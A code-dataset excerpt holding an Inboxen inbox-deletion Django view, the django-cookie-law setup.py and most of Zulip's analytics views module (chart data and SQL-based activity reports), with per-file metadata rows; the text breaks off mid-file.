# You should have received a copy of the GNU Affero General Public License
# along with Inboxen. If not, see <http://www.gnu.org/licenses/>.
##
from django.views import generic
from django.utils.translation import ugettext as _
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse_lazy
from django.contrib import messages
from inboxen import models
from queue.delete.tasks import delete_inbox
from website import forms
from website.views import base
__all__ = ["InboxDeletionView"]
class InboxDeletionView(base.CommonContextMixin, base.LoginRequiredMixin, generic.DeleteView):
    """Confirm-and-delete view for one of the requesting user's inboxes.

    Deletion is soft: the inbox is flagged as deleted and saved, and a
    background task is queued to purge its contents, rather than removing
    the database row here.
    """
    model = models.Inbox
    success_url = reverse_lazy('user-home')
    headline = _("Delete Inbox")
    template_name = "inbox/delete.html"

    def get_object(self, *args, **kwargs):
        # Scope the lookup to the requesting user's own inbox_set so a user
        # can never delete somebody else's inbox; raises DoesNotExist (-> 404
        # via Django's generic-view machinery) otherwise.
        return self.request.user.inbox_set.get(
            inbox=self.kwargs["inbox"],
            domain__domain=self.kwargs["domain"]
        )

    def delete(self, request, *args, **kwargs):  # fixed misspelled "**kawrgs"
        self.object = self.get_object()
        success_url = self.get_success_url()

        # Soft-delete: mark the inbox, persist the flag, then hand the heavy
        # lifting (purging messages) to the task queue.
        self.object.flags.deleted = True
        self.object.save()
        delete_inbox.delay(self.object.id, request.user.id)

        messages.success(request, _("{0}@{1} has been deleted.".format(self.object.inbox, self.object.domain.domain)))

        return HttpResponseRedirect(success_url)
| agpl-3.0 | -7,981,159,622,210,445,000 | 36.351852 | 118 | 0.706495 | false | 3.80566 | false | false | false |
juan-cb/django-cookie-law | setup.py | 1 | 1609 | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
from itertools import chain
from glob import glob
import cookielaw
# PyPI trove classifiers advertising the package's maturity and environment.
CLASSIFIERS = [
    'Development Status :: 5 - Production/Stable',
    'Environment :: Web Environment',
    'Framework :: Django',
    'Intended Audience :: Developers',
    'License :: OSI Approved :: BSD License',
    'Operating System :: OS Independent',
    'Programming Language :: Python',
    'Programming Language :: JavaScript',
    'Topic :: Internet :: WWW/HTTP',
    'Topic :: Internet :: WWW/HTTP :: Session',
]
# Glob patterns (relative to the repo root) for the non-Python files that
# must ship inside the installed package: templates, static assets, locales.
package_data_globs = (
    'cookielaw/templates/cookielaw/*.html',
    'cookielaw/static/cookielaw/*/*',
    'cookielaw/locale/*/*/*'
)

# Expand the globs and strip the leading "cookielaw/" component, because
# package_data paths are interpreted relative to the package directory.
package_data = [f.split('/', 1)[1]
                for f in chain.from_iterable(map(glob, package_data_globs))]
# Declarative package metadata; the long description is taken verbatim from
# the README so PyPI shows the same text as the repository front page.
setup(
    author='Piotr Kilczuk',
    author_email='[email protected]',
    name='django-cookie-law',
    # Version is kept in cookielaw.VERSION (a tuple of ints) as the single
    # source of truth and joined into a dotted string here.
    version='.'.join(str(v) for v in cookielaw.VERSION),
    description='Helps your Django project comply with EU cookie law regulations',
    long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
    url='https://github.com/TyMaszWeb/django-cookie-law',
    license='BSD License',
    platforms=['OS Independent'],
    classifiers=CLASSIFIERS,
    install_requires=[
        'Django>=1.2',
        'django-classy-tags>=0.3.0',
    ],
    tests_require=[
        'selenium==3.0.1',
    ],
    packages=find_packages(),
    # Non-Python files (templates/static/locale) collected above.
    package_data={'cookielaw': package_data},
    include_package_data=False,
    zip_safe=False,
    test_suite='runtests.main',
)
| bsd-2-clause | -8,123,308,249,982,098,000 | 27.22807 | 88 | 0.649472 | false | 3.408898 | false | false | false |
sonali0901/zulip | analytics/views.py | 1 | 37020 | from __future__ import absolute_import, division
from django.conf import settings
from django.core import urlresolvers
from django.db import connection
from django.db.models import Sum
from django.db.models.query import QuerySet
from django.http import HttpResponseNotFound, HttpRequest, HttpResponse
from django.template import RequestContext, loader
from django.utils import timezone
from django.utils.translation import ugettext as _
from jinja2 import Markup as mark_safe
from analytics.lib.counts import CountStat, process_count_stat, COUNT_STATS
from analytics.lib.time_utils import time_range
from analytics.models import BaseCount, InstallationCount, RealmCount, \
UserCount, StreamCount, last_successful_fill
from zerver.decorator import has_request_variables, REQ, zulip_internal, \
zulip_login_required, to_non_negative_int, to_utc_datetime
from zerver.lib.request import JsonableError
from zerver.lib.response import json_success
from zerver.lib.timestamp import ceiling_to_hour, ceiling_to_day, timestamp_to_datetime
from zerver.models import Realm, UserProfile, UserActivity, \
UserActivityInterval, Client
from zproject.jinja2 import render_to_response
from collections import defaultdict
from datetime import datetime, timedelta
import itertools
import json
import logging
import pytz
import re
import time
from six.moves import filter, map, range, zip
from typing import Any, Dict, List, Tuple, Optional, Callable, Type, \
Union, Text
@zulip_login_required
def stats(request):
    # type: (HttpRequest) -> HttpResponse
    """Render the /stats analytics page for the requesting user's realm."""
    return render_to_response('analytics/stats.html',
                              context=dict(realm_name = request.user.realm.name))
@has_request_variables
def get_chart_data(request, user_profile, chart_name=REQ(),
                   min_length=REQ(converter=to_non_negative_int, default=None),
                   start=REQ(converter=to_utc_datetime, default=None),
                   end=REQ(converter=to_utc_datetime, default=None)):
    # type: (HttpRequest, UserProfile, Text, Optional[int], Optional[datetime], Optional[datetime]) -> HttpResponse
    """JSON endpoint backing the /stats charts.

    Maps `chart_name` to a CountStat plus presentation metadata (which
    tables to read, subgroup keys, display labels, label ordering), then
    returns per-label time series for the requester's realm and/or user.
    """
    # Per-chart configuration.  `include_empty_subgroups` is parallel to
    # `tables`: whether to emit an all-zero series for a subgroup with no
    # data in that table.
    if chart_name == 'number_of_humans':
        stat = COUNT_STATS['active_users:is_bot:day']
        tables = [RealmCount]
        subgroups = ['false', 'true']
        labels = ['human', 'bot']
        labels_sort_function = None
        include_empty_subgroups = [True]
    elif chart_name == 'messages_sent_over_time':
        stat = COUNT_STATS['messages_sent:is_bot:hour']
        tables = [RealmCount, UserCount]
        subgroups = ['false', 'true']
        labels = ['human', 'bot']
        labels_sort_function = None
        include_empty_subgroups = [True, False]
    elif chart_name == 'messages_sent_by_message_type':
        stat = COUNT_STATS['messages_sent:message_type:day']
        tables = [RealmCount, UserCount]
        subgroups = ['public_stream', 'private_stream', 'private_message']
        labels = ['Public Streams', 'Private Streams', 'PMs & Group PMs']
        labels_sort_function = lambda data: sort_by_totals(data['realm'])
        include_empty_subgroups = [True, True]
    elif chart_name == 'messages_sent_by_client':
        stat = COUNT_STATS['messages_sent:client:day']
        tables = [RealmCount, UserCount]
        subgroups = [str(x) for x in Client.objects.values_list('id', flat=True).order_by('id')]
        # these are further re-written by client_label_map
        labels = list(Client.objects.values_list('name', flat=True).order_by('id'))
        labels_sort_function = sort_client_labels
        include_empty_subgroups = [False, False]
    else:
        raise JsonableError(_("Unknown chart name: %s") % (chart_name,))

    # Most likely someone using our API endpoint. The /stats page does not
    # pass a start or end in its requests.
    if start is not None and end is not None and start > end:
        raise JsonableError(_("Start time is later than end time. Start: %(start)s, End: %(end)s") %
                            {'start': start, 'end': end})

    # Default the window to [realm creation, last successful analytics fill].
    realm = user_profile.realm
    if start is None:
        start = realm.date_created
    if end is None:
        end = last_successful_fill(stat.property)
    if end is None or start > end:
        logging.warning("User from realm %s attempted to access /stats, but the computed "
                        "start time: %s (creation time of realm) is later than the computed "
                        "end time: %s (last successful analytics update). Is the "
                        "analytics cron job running?" % (realm.string_id, start, end))
        raise JsonableError(_("No analytics data available. Please contact your server administrator."))

    end_times = time_range(start, end, stat.frequency, min_length)
    data = {'end_times': end_times, 'frequency': stat.frequency, 'interval': stat.interval}
    for table, include_empty_subgroups_ in zip(tables, include_empty_subgroups):
        if table == RealmCount:
            data['realm'] = get_time_series_by_subgroup(
                stat, RealmCount, realm.id, end_times, subgroups, labels, include_empty_subgroups_)
        if table == UserCount:
            data['user'] = get_time_series_by_subgroup(
                stat, UserCount, user_profile.id, end_times, subgroups, labels, include_empty_subgroups_)
    # Optional client-side ordering hint for the chart legend.
    if labels_sort_function is not None:
        data['display_order'] = labels_sort_function(data)
    else:
        data['display_order'] = None
    return json_success(data=data)
def sort_by_totals(value_arrays):
    # type: (Dict[str, List[int]]) -> List[str]
    """Return the labels ordered by the sum of their series, largest first."""
    label_totals = {label: sum(series) for label, series in value_arrays.items()}
    return sorted(label_totals, key=label_totals.get, reverse=True)
def sort_client_labels(data):
    # type: (Dict[str, Dict[str, List[int]]]) -> List[str]
    """Rank client labels for chart display.

    For any given user we want a fixed set of clients shown regardless of
    the time aggregation or whether realm or user data is viewed, ideally
    the clients most important for understanding the realm's and the user's
    traffic.  Each label's sort value starts as its rank in the realm-wide
    ordering, then is lowered to (user rank - .1) whenever that is better,
    so the user's own top clients win ties against realm-wide ranks.
    """
    sort_value = {}  # type: Dict[str, float]
    for rank, label in enumerate(sort_by_totals(data['realm'])):
        sort_value[label] = rank
    for rank, label in enumerate(sort_by_totals(data['user'])):
        sort_value[label] = min(rank - .1, sort_value.get(label, rank))
    return sorted(sort_value, key=sort_value.get)
def table_filtered_to_id(table, key_id):
    # type: (Type[BaseCount], int) -> QuerySet
    """Return a queryset over `table` restricted to the owner `key_id`.

    InstallationCount has no owner column, so it is returned unfiltered.
    Raises ValueError for an unrecognized analytics table.
    """
    if table == RealmCount:
        return RealmCount.objects.filter(realm_id=key_id)
    if table == UserCount:
        return UserCount.objects.filter(user_id=key_id)
    if table == StreamCount:
        return StreamCount.objects.filter(stream_id=key_id)
    if table == InstallationCount:
        return InstallationCount.objects.all()
    raise ValueError("Unknown table: %s" % (table,))
def client_label_map(name):
    # type: (str) -> str
    """Map a raw Client.name to the human-readable label used in /stats."""
    exact_names = {
        "website": "Website",
        "ZulipAndroid": "Android app",
        "ZulipiOS": "Old iOS app",
        "ZulipMobile": "New iOS app",
        "ZulipPython": "Python API",
        "API: Python": "Python API",
    }
    if name in exact_names:
        return exact_names[name]
    if name.startswith("desktop app"):
        return "Old desktop app"
    if name.startswith("Zulip") and name.endswith("Webhook"):
        # "ZulipFooWebhook" -> "Foo webhook"
        return name[len("Zulip"):-len("Webhook")] + " webhook"
    # Clients in dev environment autogenerated data start with _ so
    # that it's easy to manually drop without affecting other data.
    if settings.DEVELOPMENT and name.startswith("_"):
        return name[1:]
    return name
def rewrite_client_arrays(value_arrays):
    # type: (Dict[str, List[int]]) -> Dict[str, List[int]]
    """Merge client series whose raw names map to the same display label.

    Series that collapse onto one label (via client_label_map) are summed
    element-wise; single-label series are copied.
    """
    merged = {}  # type: Dict[str, List[int]]
    for raw_label, series in value_arrays.items():
        target = client_label_map(raw_label)
        if target not in merged:
            merged[target] = list(series)
        else:
            accumulated = merged[target]
            for idx, value in enumerate(series):
                accumulated[idx] += value
    return merged
def get_time_series_by_subgroup(stat, table, key_id, end_times, subgroups, labels, include_empty_subgroups):
    # type: (CountStat, Type[BaseCount], Optional[int], List[datetime], List[str], List[str], bool) -> Dict[str, List[int]]
    """Read one CountStat's rows into {label: [value per end_time]} series.

    `subgroups` and `labels` are parallel lists; missing (subgroup, end_time)
    cells default to 0.  Subgroups with no data at all are only emitted when
    include_empty_subgroups is set.
    """
    if len(subgroups) != len(labels):
        raise ValueError("subgroups and labels have lengths %s and %s, which are different." %
                         (len(subgroups), len(labels)))
    queryset = table_filtered_to_id(table, key_id).filter(property=stat.property) \
               .values_list('subgroup', 'end_time', 'value')
    value_dicts = defaultdict(lambda: defaultdict(int)) # type: Dict[Optional[str], Dict[datetime, int]]
    for subgroup, end_time, value in queryset:
        value_dicts[subgroup][end_time] = value
    value_arrays = {}
    for subgroup, label in zip(subgroups, labels):
        if (subgroup in value_dicts) or include_empty_subgroups:
            # defaultdict fills gaps in the time series with zeros.
            value_arrays[label] = [value_dicts[subgroup][end_time] for end_time in end_times]

    if stat == COUNT_STATS['messages_sent:client:day']:
        # HACK: We rewrite these arrays to collapse the Client objects
        # with similar names into a single sum, and generally give
        # them better names
        return rewrite_client_arrays(value_arrays)
    return value_arrays
# Timezone used when formatting timestamps in the activity report tables.
eastern_tz = pytz.timezone('US/Eastern')
def make_table(title, cols, rows, has_row_class=False):
    # type: (str, List[str], List[Any], bool) -> str
    """Render an HTML table via the ad_hoc_query template.

    When has_row_class is False, `rows` is a list of plain cell lists and is
    normalized into the dict shape (cells/row_class) the template expects;
    otherwise rows are assumed to already be in that shape.
    """
    if not has_row_class:
        rows = [dict(cells=row, row_class=None) for row in rows]
    return loader.render_to_string(
        'analytics/ad_hoc_query.html',
        dict(data=dict(title=title, cols=cols, rows=rows))
    )
def dictfetchall(cursor):
    # type: (connection.cursor) -> List[Dict[str, Any]]
    """Return every remaining row from `cursor` as a column-name -> value dict."""
    columns = [col[0] for col in cursor.description]
    return [dict(zip(columns, row)) for row in cursor.fetchall()]
def get_realm_day_counts():
    # type: () -> Dict[str, Dict[str, str]]
    """Per-realm human-message counts for each of the last 8 days.

    Returns {string_id: {'cnts': html}} where `html` is a run of <td> cells,
    one per day, CSS-classed 'bad'/'good'/'neutral' for the realm's min/max/
    other daily counts.
    """
    query = '''
        select
            r.string_id,
            (now()::date - pub_date::date) age,
            count(*) cnt
        from zerver_message m
        join zerver_userprofile up on up.id = m.sender_id
        join zerver_realm r on r.id = up.realm_id
        join zerver_client c on c.id = m.sending_client_id
        where
            (not up.is_bot)
        and
            pub_date > now()::date - interval '8 day'
        and
            c.name not in ('zephyr_mirror', 'ZulipMonitoring')
        group by
            r.string_id,
            age
        order by
            r.string_id,
            age
    '''
    cursor = connection.cursor()
    cursor.execute(query)
    rows = dictfetchall(cursor)
    cursor.close()

    # counts[string_id][age_in_days] = message count
    counts = defaultdict(dict) # type: Dict[str, Dict[int, int]]
    for row in rows:
        counts[row['string_id']][row['age']] = row['cnt']

    result = {}
    for string_id in counts:
        # Days with no messages default to 0 so every realm gets 8 cells.
        raw_cnts = [counts[string_id].get(age, 0) for age in range(8)]
        min_cnt = min(raw_cnts)
        max_cnt = max(raw_cnts)

        # Closure over this realm's min/max; consumed immediately below, so
        # the late binding is safe.
        def format_count(cnt):
            # type: (int) -> str
            if cnt == min_cnt:
                good_bad = 'bad'
            elif cnt == max_cnt:
                good_bad = 'good'
            else:
                good_bad = 'neutral'

            return '<td class="number %s">%s</td>' % (good_bad, cnt)

        cnts = ''.join(map(format_count, raw_cnts))
        result[string_id] = dict(cnts=cnts)
    return result
def realm_summary_table(realm_minutes):
    # type: (Dict[str, float]) -> str
    """Render the top-level 'Counts' table of the activity dashboard.

    One row per realm with recent activity: active/total user counts, bot
    count, "at risk" users (last seen 1-7 days ago), per-day message
    history, and online hours taken from `realm_minutes` (per-realm minutes
    computed by user_activity_intervals).  A 'Total' row is appended.
    """
    query = '''
        SELECT
            realm.string_id,
            coalesce(user_counts.active_user_count, 0) active_user_count,
            coalesce(at_risk_counts.at_risk_count, 0) at_risk_count,
            (
                SELECT
                    count(*)
                FROM zerver_userprofile up
                WHERE up.realm_id = realm.id
                AND is_active
                AND not is_bot
            ) user_profile_count,
            (
                SELECT
                    count(*)
                FROM zerver_userprofile up
                WHERE up.realm_id = realm.id
                AND is_active
                AND is_bot
            ) bot_count
        FROM zerver_realm realm
        LEFT OUTER JOIN
            (
                SELECT
                    up.realm_id realm_id,
                    count(distinct(ua.user_profile_id)) active_user_count
                FROM zerver_useractivity ua
                JOIN zerver_userprofile up
                    ON up.id = ua.user_profile_id
                WHERE
                    query in (
                        '/json/send_message',
                        'send_message_backend',
                        '/api/v1/send_message',
                        '/json/update_pointer',
                        '/json/users/me/pointer'
                    )
                AND
                    last_visit > now() - interval '1 day'
                AND
                    not is_bot
                GROUP BY realm_id
            ) user_counts
            ON user_counts.realm_id = realm.id
        LEFT OUTER JOIN
            (
                SELECT
                    realm_id,
                    count(*) at_risk_count
                FROM (
                    SELECT
                        realm.id as realm_id,
                        up.email
                    FROM zerver_useractivity ua
                    JOIN zerver_userprofile up
                        ON up.id = ua.user_profile_id
                    JOIN zerver_realm realm
                        ON realm.id = up.realm_id
                    WHERE up.is_active
                    AND (not up.is_bot)
                    AND
                        ua.query in (
                            '/json/send_message',
                            'send_message_backend',
                            '/api/v1/send_message',
                            '/json/update_pointer',
                            '/json/users/me/pointer'
                        )
                    GROUP by realm.id, up.email
                    HAVING max(last_visit) between
                        now() - interval '7 day' and
                        now() - interval '1 day'
                ) as at_risk_users
                GROUP BY realm_id
            ) at_risk_counts
            ON at_risk_counts.realm_id = realm.id
        WHERE EXISTS (
                SELECT *
                FROM zerver_useractivity ua
                JOIN zerver_userprofile up
                    ON up.id = ua.user_profile_id
                WHERE
                    query in (
                        '/json/send_message',
                        '/api/v1/send_message',
                        'send_message_backend',
                        '/json/update_pointer',
                        '/json/users/me/pointer'
                    )
                AND
                    up.realm_id = realm.id
                AND
                    last_visit > now() - interval '2 week'
        )
        ORDER BY active_user_count DESC, string_id ASC
    '''

    cursor = connection.cursor()
    cursor.execute(query)
    rows = dictfetchall(cursor)
    cursor.close()

    # get messages sent per day
    counts = get_realm_day_counts()
    for row in rows:
        try:
            row['history'] = counts[row['string_id']]['cnts']
        except Exception:
            # Realm sent no recent messages; leave the history column blank.
            row['history'] = ''

    # augment data with realm_minutes
    total_hours = 0.0
    for row in rows:
        string_id = row['string_id']
        minutes = realm_minutes.get(string_id, 0.0)
        hours = minutes / 60.0
        total_hours += hours
        row['hours'] = str(int(hours))
        try:
            row['hours_per_user'] = '%.1f' % (hours / row['active_user_count'],)
        except Exception:
            # Division by zero for realms with no active users; omit the cell.
            pass

    # formatting
    for row in rows:
        row['string_id'] = realm_activity_link(row['string_id'])

    # Count active sites
    def meets_goal(row):
        # type: (Dict[str, int]) -> bool
        return row['active_user_count'] >= 5

    num_active_sites = len(list(filter(meets_goal, rows)))

    # create totals
    total_active_user_count = 0
    total_user_profile_count = 0
    total_bot_count = 0
    total_at_risk_count = 0
    for row in rows:
        total_active_user_count += int(row['active_user_count'])
        total_user_profile_count += int(row['user_profile_count'])
        total_bot_count += int(row['bot_count'])
        total_at_risk_count += int(row['at_risk_count'])

    rows.append(dict(
        string_id='Total',
        active_user_count=total_active_user_count,
        user_profile_count=total_user_profile_count,
        bot_count=total_bot_count,
        hours=int(total_hours),
        at_risk_count=total_at_risk_count,
    ))

    content = loader.render_to_string(
        'analytics/realm_summary_table.html',
        dict(rows=rows, num_active_sites=num_active_sites)
    )
    return content
def user_activity_intervals():
    # type: () -> Tuple[mark_safe, Dict[str, float]]
    """Summarize per-user online time over the last 24 hours.

    Returns (html, realm_minutes) where `html` is a <pre>-wrapped report
    listing each user's total connected duration grouped by realm, and
    `realm_minutes` maps realm string_id -> total minutes (consumed by
    realm_summary_table).
    """
    day_end = timestamp_to_datetime(time.time())
    day_start = day_end - timedelta(hours=24)

    output = "Per-user online duration for the last 24 hours:\n"
    total_duration = timedelta(0)

    # All intervals overlapping the window, ordered by (realm, email) so the
    # itertools.groupby calls below see contiguous groups.
    all_intervals = UserActivityInterval.objects.filter(
        end__gte=day_start,
        start__lte=day_end
    ).select_related(
        'user_profile',
        'user_profile__realm'
    ).only(
        'start',
        'end',
        'user_profile__email',
        'user_profile__realm__string_id'
    ).order_by(
        'user_profile__realm__string_id',
        'user_profile__email'
    )

    by_string_id = lambda row: row.user_profile.realm.string_id
    by_email = lambda row: row.user_profile.email

    realm_minutes = {}

    for string_id, realm_intervals in itertools.groupby(all_intervals, by_string_id):
        realm_duration = timedelta(0)
        output += '<hr>%s\n' % (string_id,)
        for email, intervals in itertools.groupby(realm_intervals, by_email):
            duration = timedelta(0)
            for interval in intervals:
                # Clamp each interval to the 24-hour window before summing.
                start = max(day_start, interval.start)
                end = min(day_end, interval.end)
                duration += end - start

            total_duration += duration
            realm_duration += duration
            output += "  %-*s%s\n" % (37, email, duration)

        realm_minutes[string_id] = realm_duration.total_seconds() / 60

    output += "\nTotal Duration: %s\n" % (total_duration,)
    output += "\nTotal Duration in minutes: %s\n" % (total_duration.total_seconds() / 60.,)
    output += "Total Duration amortized to a month: %s" % (total_duration.total_seconds() * 30. / 60.,)
    content = mark_safe('<pre>' + output + '</pre>')
    return content, realm_minutes
def sent_messages_report(realm):
    # type: (str) -> str
    """Render a table of daily human/bot message counts for the last 2 weeks.

    Uses generate_series so days without messages still appear (with NULL
    counts) in the output.
    """
    title = 'Recently sent messages for ' + realm

    cols = [
        'Date',
        'Humans',
        'Bots'
    ]

    query = '''
        select
            series.day::date,
            humans.cnt,
            bots.cnt
        from (
            select generate_series(
                (now()::date - interval '2 week'),
                now()::date,
                interval '1 day'
            ) as day
        ) as series
        left join (
            select
                pub_date::date pub_date,
                count(*) cnt
            from zerver_message m
            join zerver_userprofile up on up.id = m.sender_id
            join zerver_realm r on r.id = up.realm_id
            where
                r.string_id = %s
            and
                (not up.is_bot)
            and
                pub_date > now() - interval '2 week'
            group by
                pub_date::date
            order by
                pub_date::date
        ) humans on
            series.day = humans.pub_date
        left join (
            select
                pub_date::date pub_date,
                count(*) cnt
            from zerver_message m
            join zerver_userprofile up on up.id = m.sender_id
            join zerver_realm r on r.id = up.realm_id
            where
                r.string_id = %s
            and
                up.is_bot
            and
                pub_date > now() - interval '2 week'
            group by
                pub_date::date
            order by
                pub_date::date
        ) bots on
            series.day = bots.pub_date
    '''
    cursor = connection.cursor()
    # The realm string_id is passed as a bound parameter for both subqueries.
    cursor.execute(query, [realm, realm])
    rows = cursor.fetchall()
    cursor.close()

    return make_table(title, cols, rows)
def ad_hoc_queries():
    # type: () -> List[Dict[str, str]]
    """Run the fixed set of cross-realm usage reports for the dashboard.

    Returns a list of {'title': ..., 'content': html} pages: mobile usage,
    desktop usage, and integrations broken down by realm and by client.
    NOTE(review): queries are built with %-interpolation, but only from the
    hard-coded constants below ('Android'/'ZulipiOS'), never user input.
    """
    def get_page(query, cols, title):
        # type: (str, List[str], str) -> Dict[str, str]
        # Execute the query and render the rows, linkifying realm columns
        # and formatting timestamp columns.
        cursor = connection.cursor()
        cursor.execute(query)
        rows = cursor.fetchall()
        rows = list(map(list, rows))
        cursor.close()

        def fix_rows(i, fixup_func):
            # type: (int, Union[Callable[[Realm], mark_safe], Callable[[datetime], str]]) -> None
            for row in rows:
                row[i] = fixup_func(row[i])

        for i, col in enumerate(cols):
            if col == 'Realm':
                fix_rows(i, realm_activity_link)
            elif col in ['Last time', 'Last visit']:
                fix_rows(i, format_date_for_activity_reports)

        content = make_table(title, cols, rows)

        return dict(
            content=content,
            title=title
        )

    pages = []

    ###

    for mobile_type in ['Android', 'ZulipiOS']:
        title = '%s usage' % (mobile_type,)

        query = '''
            select
                realm.string_id,
                up.id user_id,
                client.name,
                sum(count) as hits,
                max(last_visit) as last_time
            from zerver_useractivity ua
            join zerver_client client on client.id = ua.client_id
            join zerver_userprofile up on up.id = ua.user_profile_id
            join zerver_realm realm on realm.id = up.realm_id
            where
                client.name like '%s'
            group by string_id, up.id, client.name
            having max(last_visit) > now() - interval '2 week'
            order by string_id, up.id, client.name
        ''' % (mobile_type,)

        cols = [
            'Realm',
            'User id',
            'Name',
            'Hits',
            'Last time'
        ]

        pages.append(get_page(query, cols, title))

    ###

    title = 'Desktop users'

    query = '''
        select
            realm.string_id,
            client.name,
            sum(count) as hits,
            max(last_visit) as last_time
        from zerver_useractivity ua
        join zerver_client client on client.id = ua.client_id
        join zerver_userprofile up on up.id = ua.user_profile_id
        join zerver_realm realm on realm.id = up.realm_id
        where
            client.name like 'desktop%%'
        group by string_id, client.name
        having max(last_visit) > now() - interval '2 week'
        order by string_id, client.name
    '''

    cols = [
        'Realm',
        'Client',
        'Hits',
        'Last time'
    ]

    pages.append(get_page(query, cols, title))

    ###

    title = 'Integrations by realm'

    query = '''
        select
            realm.string_id,
            case
                when query like '%%external%%' then split_part(query, '/', 5)
                else client.name
            end client_name,
            sum(count) as hits,
            max(last_visit) as last_time
        from zerver_useractivity ua
        join zerver_client client on client.id = ua.client_id
        join zerver_userprofile up on up.id = ua.user_profile_id
        join zerver_realm realm on realm.id = up.realm_id
        where
            (query in ('send_message_backend', '/api/v1/send_message')
            and client.name not in ('Android', 'ZulipiOS')
            and client.name not like 'test: Zulip%%'
            )
        or
            query like '%%external%%'
        group by string_id, client_name
        having max(last_visit) > now() - interval '2 week'
        order by string_id, client_name
    '''

    cols = [
        'Realm',
        'Client',
        'Hits',
        'Last time'
    ]

    pages.append(get_page(query, cols, title))

    ###

    title = 'Integrations by client'

    query = '''
        select
            case
                when query like '%%external%%' then split_part(query, '/', 5)
                else client.name
            end client_name,
            realm.string_id,
            sum(count) as hits,
            max(last_visit) as last_time
        from zerver_useractivity ua
        join zerver_client client on client.id = ua.client_id
        join zerver_userprofile up on up.id = ua.user_profile_id
        join zerver_realm realm on realm.id = up.realm_id
        where
            (query in ('send_message_backend', '/api/v1/send_message')
            and client.name not in ('Android', 'ZulipiOS')
            and client.name not like 'test: Zulip%%'
            )
        or
            query like '%%external%%'
        group by client_name, string_id
        having max(last_visit) > now() - interval '2 week'
        order by client_name, string_id
    '''

    cols = [
        'Client',
        'Realm',
        'Hits',
        'Last time'
    ]

    pages.append(get_page(query, cols, title))

    return pages
@zulip_internal
@has_request_variables
def get_activity(request):
    # type: (HttpRequest) -> HttpResponse
    """Render the server-wide activity dashboard (Counts, Durations, and
    the ad-hoc usage report pages)."""
    duration_content, realm_minutes = user_activity_intervals() # type: Tuple[mark_safe, Dict[str, float]]
    counts_content = realm_summary_table(realm_minutes) # type: str
    data = [
        ('Counts', counts_content),
        ('Durations', duration_content),
    ]
    for page in ad_hoc_queries():
        data.append((page['title'], page['content']))

    title = 'Activity'

    return render_to_response(
        'analytics/activity.html',
        dict(data=data, title=title, is_home=True),
        request=request
    )
def get_user_activity_records_for_realm(realm, is_bot):
    # type: (str, bool) -> QuerySet
    """Fetch activity rows for every active (non-)bot user of a realm,
    ordered by email and then most recent visit first."""
    fields = [
        'user_profile__full_name',
        'user_profile__email',
        'query',
        'client__name',
        'count',
        'last_visit',
    ]
    return UserActivity.objects.filter(
        user_profile__realm__string_id=realm,
        user_profile__is_active=True,
        user_profile__is_bot=is_bot
    ).order_by(
        "user_profile__email", "-last_visit"
    ).select_related('user_profile', 'client').only(*fields)
def get_user_activity_records_for_email(email):
    # type: (str) -> List[QuerySet]
    """Fetch all activity rows for a single user (by email), newest first."""
    fields = [
        'user_profile__full_name',
        'query',
        'client__name',
        'count',
        'last_visit'
    ]
    return UserActivity.objects.filter(
        user_profile__email=email
    ).order_by("-last_visit").select_related('user_profile', 'client').only(*fields)
def raw_user_activity_table(records):
    # type: (List[QuerySet]) -> str
    """Render the unaggregated per-(query, client) activity rows as a table."""
    cols = [
        'query',
        'client',
        'count',
        'last_visit'
    ]

    rows = [
        [
            record.query,
            record.client.name,
            record.count,
            format_date_for_activity_reports(record.last_visit),
        ]
        for record in records
    ]

    return make_table('Raw Data', cols, rows)
def get_user_activity_summary(records):
    # type: (List[QuerySet]) -> Dict[str, Dict[str, Any]]
    """Aggregate raw UserActivity records into per-category totals.

    Returns a dict mapping category keys ('use', 'send', 'pointer',
    'desktop', 'website', individual client names, ...) to
    {'count': total, 'last_visit': most recent}, plus a 'name' entry with
    the user's full name when any records exist.

    The value type is Any rather than Union[int, datetime] because current
    typing support can't express the mixed per-key shapes cleanly.
    """
    summary = {}  # type: Dict[str, Dict[str, Any]]

    def tally(key, record):
        # type: (str, QuerySet) -> None
        entry = summary.get(key)
        if entry is None:
            summary[key] = dict(
                count=record.count,
                last_visit=record.last_visit
            )
        else:
            entry['count'] += record.count
            entry['last_visit'] = max(entry['last_visit'], record.last_visit)

    if records:
        summary['name'] = records[0].user_profile.full_name

    for record in records:
        client = record.client.name
        query = record.query
        tally('use', record)
        if client == 'API':
            match = re.match('/api/.*/external/(.*)', query)
            if match:
                # Webhook traffic: credit the integration name itself.
                client = match.group(1)
                tally(client, record)
        if client.startswith('desktop'):
            tally('desktop', record)
        if client == 'website':
            # NOTE: 'website' is tallied here and again by the final
            # tally(client, ...) below, so its count is doubled; preserved
            # to keep the report's historical behavior.
            tally('website', record)
        if ('send_message' in query) or re.search('/api/.*/external/.*', query):
            tally('send', record)
        if query in ['/json/update_pointer', '/json/users/me/pointer', '/api/v1/update_pointer']:
            tally('pointer', record)
        tally(client, record)

    return summary
def format_date_for_activity_reports(date):
    # type: (Optional[datetime]) -> str
    """Format a datetime in US/Eastern for the report tables; '' for None."""
    return date.astimezone(eastern_tz).strftime('%Y-%m-%d %H:%M') if date else ''
def user_activity_link(email):
    # type: (str) -> mark_safe
    """Return an HTML anchor linking to the per-user activity page."""
    url = urlresolvers.reverse('analytics.views.get_user_activity',
                               kwargs=dict(email=email))
    return mark_safe('<a href="%s">%s</a>' % (url, email))
def realm_activity_link(realm_str):
    # type: (str) -> mark_safe
    """Return an HTML anchor linking to the per-realm activity page."""
    url = urlresolvers.reverse('analytics.views.get_realm_activity',
                               kwargs=dict(realm_str=realm_str))
    return mark_safe('<a href="%s">%s</a>' % (url, realm_str))
def realm_client_table(user_summaries):
    # type: (Dict[str, Dict[str, Dict[str, Any]]]) -> str
    """Build the per-realm 'Clients' table: one row per (user, client) pair.

    Aggregate/meta keys produced by get_user_activity_summary are skipped so
    only genuine client names appear.
    """
    exclude_keys = [
        'internal',
        'name',
        'use',
        'send',
        'pointer',
        'website',
        'desktop',
    ]

    rows = []
    for email, user_summary in user_summaries.items():
        email_link = user_activity_link(email)
        name = user_summary['name']
        for client, totals in user_summary.items():
            if client in exclude_keys:
                continue
            rows.append([
                format_date_for_activity_reports(totals['last_visit']),
                client,
                name,
                email_link,
                totals['count'],
            ])

    # Most recent activity first (formatted dates sort lexicographically).
    rows.sort(key=lambda r: r[0], reverse=True)

    cols = [
        'Last visit',
        'Client',
        'Name',
        'Email',
        'Count',
    ]

    return make_table('Clients', cols, rows)
def user_activity_summary_table(user_summary):
